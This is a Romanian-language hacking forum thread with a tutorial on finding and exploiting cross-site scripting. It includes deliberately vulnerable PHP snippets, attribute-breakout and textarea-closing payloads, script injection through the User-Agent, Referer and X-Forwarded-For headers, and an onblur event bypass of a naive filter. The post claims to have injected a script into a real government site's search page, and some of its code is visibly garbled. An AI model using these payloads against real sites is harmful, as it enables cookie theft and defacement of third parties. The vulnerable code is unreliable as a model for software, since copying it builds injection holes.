io.kent Posted June 27, 2013 Report Share Posted June 27, 2013 (edited) Nu ne limitam sa gasim xss ca de obicei cu tipicul script <script>alert("XSS")</script>Una dintre cele mai comune vulneranbilitati in ziua de azi foarte periculoasa ca toate este ca daca sti sa te folosesti de ele, poti face orice vrei..Cazu 1orice vulnerabilitate este limitata atata cat vrei tu..incepand cu Cookies pana la un deface, doar iti trebuie 2 lucrurii esentiale, 1) mentalitate2) imaginatiedupa aia limita e cerul..unu din cazurile cele mai comune codul vulnerabil :<html> <head> <title> Formular de cautare </ title> </ head> <body> <center> <? if (isset ($ _POST [Text])) { $ XSS = $ _POST [text]; dor "name = \" XSS \ "metoda = \" POST \ "> <form <h1> 0 rezultate </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "$ XSS \ "name = \" text \ "> <br> <input type=\"submit\" value=\"Cautare\"> </ form> "; } else { echo "<forma nume = \ "XSS \" metoda = \ "POST \"> <h1> Formular de c?utare </ h1> <br> <hr> <br> <input type = \ "text \" value = \ "\" name = \ " textul \ "> <br> <input type=\"submit\" value=\"Cautare\"> </form>"; } ?> </ center> </ body> </ html>Cum vedem in source daca cautam ceva, orice cautam ramane in fromasta e usor scriem “>Becali– "><script>alert("XSS")</script>ceea ce e logic ca ar ramane asa <input type=”text” value=””>Cazu 2 : Limitarea in anumite caractere / Campuri de text limitateun alt caz foarte comun va las aici minunea http://www.gov.ro/Nu se putea adauga nimic in from ceva de genu : “>$#-|/()=\*¿?[/CODEnici un caracter special, cautand simplu cuvant (buna) rezultatul a fost acesta [CODE]resultatgeneral.jsp?cuvantul=buna&servici=0asa ca am facut in felul urmator, http://url/resultatgeneral.jsp?cuvant=”><script>alert(/OK/)</script>&servici=0[b]Bingo [/b]asta se poate face cu TAMPER DATA (ADDON De Firefox).modificarea continutului ce se trimite prin postcazu 3 Textarea <textarea style="width:320px; height:120px" name=message></textarea>cum se poate vedea cu un simplu "> nu merge bypass daca introducem un text va arata asa<textarea style="width:320px; height:120px" name=message>Mensaje</textarea></textarea><script>alert(/PWNED/)</script>ar ramane asa : <textarea style="width:320px; height:120px" name=message></textarea><script>alert(/PWNED/)</script></textarea>HeadersAstai foarte interesanta ne jucam cu Headers sa scoatem un xss1 – User AgentSource:<?php$nav = $_SERVER['HTTP_USER_AGENT'];echo "<b><center><h1>browser:</h1><br><hr><br>$nav</center></b>";?>Header:Host: localhostUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: enAccept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-alivesi daca al modificam: Host: localhostUser-Agent: numi aduc aminte de nume :$Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: enAccept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveY … User-Agent: <script>alert(/Yeah/)</script>2 – RefererHeader:host : Ce IP am? Care este IP-ul meu?User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: enAccept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.google.com.do/Cookie: ******si daca al modificam : host : Ce IP am? Care este IP-ul meu?User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: enAccept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: <script>alert(/Yeah/)</script>Cookie: ******3 - X-Forwarded-Forhost : Ce IP am? Care este IP-ul meu?User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: enAccept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://www.google.com/X-Forwarded-For: 127.0.0.1Cookie: ******fiind 127.0.0.1 IP A Spoofear.asta ne da ca output la IP in cazul acesta ar fii 127.0.0.1host : Host: *********User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5Accept-Language: enAccept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveReferer: http://google.comX-Forwarded-For: <script>alert(/Yeah/)</script>Cookie: ******e la fel ca un xssSTR_Replacece sa faceti daca gasitii un script pentru xss<?phpif(isset($_GET[xss])){$xss = $_GET['xss'];$xss2 = str_replace("<script>", "", $xss);$xss3 = str_replace("alert", "", $xss2);echo "<form name=\"Hi\"><input type=\"text\" value=\"$xss3\" size=\"30\"></form>";}?>daca intentam sa punem <script>alert(Yeah)</script> .. ar ramane asa alert(Yeah)</script>si pentru asta nu se produce alertdar incercam sa ajungem mai incolo cum vedem in source si cautam ( aaaa) astai rezultatul <input type="text" value="aaa" size="30">parea ceva simplu de “><script>alert(WTF)</script> dar nu putem folosi script asa ca doar ne ramane sa ne gandim scriptul este complet vulnerabil codurile se imprima asa cum ajung doar excuind <script>aici o sa folosim javascript http://www.w3schools.com/js/js_events.asp).folosim : onblurintroducem : Onblur=alert(000) nu se produce alerta ramane inauntru in fromsi pentru asta daca introducem bufnita ar fi asa <input type="text" value="" bufnita size=”30”> asa ca valoarea de from, ar fi nula“ Onblur=alert(666) “<input type="text" value="" “ Onblur=alert(666) “ size=”30”>in acest caz am adauga o proprietate de avent in input provocand un xss !!Bafta... Edited June 27, 2013 by io.kent 1 Quote Link to comment Share on other sites More sharing options...
th3me Posted June 27, 2013 Report Share Posted June 27, 2013 Frumos,Frumos Quote Link to comment Share on other sites More sharing options...
aaaax22268578956 Posted June 28, 2013 Report Share Posted June 28, 2013 Tare folositor, ms:D Quote Link to comment Share on other sites More sharing options...
TokyoMode Posted June 28, 2013 Report Share Posted June 28, 2013 hmm ultima parte nu e explicata bine dar foarte bine respect pt efort frumos Quote Link to comment Share on other sites More sharing options...
io.kent Posted June 28, 2013 Author Report Share Posted June 28, 2013 TokyoMode daca esti atent cred ca intelegi bine, sau probabil e acceptabil de inteles.. Quote Link to comment Share on other sites More sharing options...
Jimmy Posted June 29, 2013 Report Share Posted June 29, 2013 Ar trebui sa specifici si sursa. Quote Link to comment Share on other sites More sharing options...